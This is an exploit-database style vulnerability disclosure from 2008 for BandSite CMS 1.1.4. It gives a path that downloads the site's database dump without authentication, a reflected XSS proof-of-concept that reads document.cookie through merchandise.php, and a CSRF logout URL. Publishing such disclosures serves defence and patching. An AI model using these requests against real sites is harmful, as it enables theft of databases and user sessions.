BandSite CMS 1.1.4 (Download Backup/XSS/CSRF) Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BandSite CMS 1.1.4 (Download Backup/XSS/CSRF) Remote Vulnerabilities
# Published : 2008-08-21
# Author : SirGod
# Previous Title : PhotoCart <= 3.9 Multiple Remote SQL Injection Vulnerabilities
# Next Title : tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability

###########################################################################
[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF
[+] Discovered By SirGod                         
[+] www.mortal-team.org                         
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN
###########################################################################

[+] Arbitrary Download Database

Go to

   http://localhost/[Path]/adminpanel/phpmydump.php

and the download will begin ( database.sql ) .


[+] Cross Site Scripting

    http://localhost/[Path]/merchandise.php?type=[XSS]
    http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>


[+] Cross Site Request Forgery

 If a logged in user with administrator privilegies click the following url he will be logged out.

    http://localhost/[Path]/adminpanel/logout.php


###########################################################################

# www.Syue.com [2008-08-21]